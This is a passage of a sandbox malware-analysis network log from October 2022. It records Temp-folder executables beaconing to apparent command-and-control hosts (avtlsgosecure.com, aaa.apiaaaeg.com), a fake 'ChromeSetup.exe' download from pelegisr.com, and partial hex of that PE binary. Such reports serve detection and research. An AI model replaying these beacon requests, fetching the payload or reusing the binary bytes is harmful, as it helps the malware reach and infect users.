                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:25.655810118 CEST7668OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://btqtaywr.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 361
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.771318913 CEST7670INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:25.818156958 CEST7670OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xixace.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 166
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:25.931803942 CEST7672INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:25.943859100 CEST7673OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://umtcicl.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 216
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:26.058640003 CEST7674INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:26 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 405
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                                                                                                                                  Oct 17, 2022 22:07:26.084053040 CEST7674OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bfdgvxgb.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 171
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:26.200664997 CEST7675INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:26 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 69
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 87 aa e3 f8 17 5a f3 c5 64 e6 bb 3c 30 c8 bf a0 fa 14 ba aa 92 89 7a a6 72 8f 96 32 31 c8 7b 5f a7 1e 36 93 97 97 2b dc fb 14 82 b6 ca c1 3e f1
                                                                                                                                  Data Ascii: %S`Nh&WQY^Zd<0zr21{_6+>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  21192.168.2.54971345.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:21.886401892 CEST6862OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:22.043654919 CEST6863INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:21 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 55 58 68 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 78 47 54 6c 6b 7a 54 6c 5a 54 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6e 70 4e 4d 30 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 44 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qUXhMQ0p5WVc1a1gzTjBjaUk2SWxGTlkzTlZTZXlKemFXUWlPall6TnpNM0xDSjBhVzFsSWpveE5qWTJDSjk=0
                                                                                                                                  Oct 17, 2022 22:07:22.053661108 CEST6863OUTPOST /check/?sid=63737&key=7ab3af34ad464188e35d31bab8ff7aae HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:22.215936899 CEST6872INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:22 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  22192.168.2.54971745.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:23.757570982 CEST7315OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:23.942482948 CEST7324INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:23 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 55 58 70 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 74 56 4e 56 59 77 61 45 35 58 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6e 70 52 4d 30 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 44 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qUXpMQ0p5WVc1a1gzTjBjaUk2SWtVNVYwaE5XZXlKemFXUWlPall6TnpRM0xDSjBhVzFsSWpveE5qWTJDSjk=0
                                                                                                                                  Oct 17, 2022 22:07:23.951872110 CEST7324OUTPOST /check/?sid=63747&key=f3dd785ba062e51ca3ca0a8858cf6030 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:24.122827053 CEST7338INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:24 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  23192.168.2.54972245.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:25.731281042 CEST7669OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:25.894103050 CEST7671INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:25 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 55 54 46 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 74 53 4d 31 59 77 62 45 39 53 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6e 70 56 4d 55 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 54 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qUTFMQ0p5WVc1a1gzTjBjaUk2SWtSM1YwbE9SZXlKemFXUWlPall6TnpVMUxDSjBhVzFsSWpveE5qWTJTSjk=0
                                                                                                                                  Oct 17, 2022 22:07:25.936383963 CEST7672OUTPOST /check/?sid=63755&key=d5d0a61724cbb4ad6589c71e993b56b2 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:26.108078957 CEST7675INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:26 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.549701162.0.217.254443C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.54970331.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.54970431.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.549707140.82.121.3443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.549708162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.54970931.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.54971031.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549694185.220.204.62443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:06:34 UTC0OUTGET /upload/ChromeSetup.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: pelegisr.com
                                                                                                                                  2022-10-17 20:06:34 UTC0INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:33 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 19:00:03 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 223744
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-10-17 20:06:34 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 6c 9a 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 5e 17 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Tv:%:%:%%:%%:%A%:%;%:%%:%%:%%:%Rich:%PELla^
                                                                                                                                  2022-10-17 20:06:34 UTC8INData Raw: 73 68 2d 63 6f 6c 6f 6d 62 69 61 00 00 00 00 73 70 61 6e 69 73 68 2d 63 68 69 6c 65 00 00 00 73 70 61 6e 69 73 68 2d 62 6f 6c 69 76 69 61 00 73 70 61 6e 69 73 68 2d 61 72 67 65 6e 74 69 6e 61 00 00 00 70 6f 72 74 75 67 75 65 73 65 2d 62 72 61 7a 69 6c 69 61 6e 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 6e 79 6e 6f 72 73 6b 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 62 6f 6b 6d 61 6c 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 00 00 00 69 74 61 6c 69 61 6e 2d 73 77 69 73 73 00 00 00 69 72 69 73 68 2d 65 6e 67 6c 69 73 68 00 00 00 67 65 72 6d 61 6e 2d 73 77 69 73 73 00 00 00 00 67 65 72 6d 61 6e 2d 6c 75 78 65 6d 62 6f 75 72 67 00 00 00 67 65 72 6d 61 6e 2d 6c 69 63 68 74 65 6e 73 74 65 69 6e 00 67 65 72 6d 61 6e 2d 61 75 73 74 72 69 61 6e 00 66 72 65 6e 63 68 2d 73
                                                                                                                                  Data Ascii: sh-colombiaspanish-chilespanish-boliviaspanish-argentinaportuguese-braziliannorwegian-nynorsknorwegian-bokmalnorwegianitalian-swissirish-englishgerman-swissgerman-luxembourggerman-lichtensteingerman-austrianfrench-s
                                                                                                                                  2022-10-17 20:06:34 UTC15INData Raw: 75 c6 05 8e 28 43 00 6c c6 05 8d 28 43 00 61 c6 05 91 28 43 00 6f c6 05 95 28 43 00 74 c6 05 88 28 43 00 56 c6 05 94 28 43 00 63 c6 05 8f 28 43 00 50 c6 05 96 28 43 00 00 c6 05 8b 28 43 00 74 c6 05 92 28 43 00 74 c6 05 8a 28 43 00 72 c6 05 90 28 43 00 72 ff 15 68 10 40 00 8d 4d fc 51 6a 40 ff 35 50 c4 58 00 a3 84 28 43 00 ff 35 cc 6d 58 00 ff d0 5e c9 c3 c3 55 8b ec b8 04 1d 00 00 e8 aa 48 00 00 53 56 33 db 33 f6 81 fe cd 14 02 00 7d 0d 53 ff 15 1c 11 40 00 ff 15 18 11 40 00 81 fe 41 5e 9d 1e 7e 12 81 7d f8 f7 5c ad 00 74 09 81 7d bc 1c c4 d4 0a 75 09 46 81 fe a3 26 be 91 72 c8 33 f6 81 fe 20 04 00 00 75 0b b8 d6 38 00 00 01 05 50 c4 58 00 83 3d 50 c4 58 00 7a 75 08 53 53 ff 15 14 11 40 00 46 81 fe ce de 40 00 7c d3 ff 35 50 c4 58 00 53 ff 15 10 11 40 00
                                                                                                                                  Data Ascii: u(Cl(Ca(Co(Ct(CV(Cc(CP(C(Ct(Ct(Cr(Crh@MQj@5PX(C5mX^UHSV33}S@@A^~}\t}uF&r3 u8PX=PXzuSS@F@|5PXS@
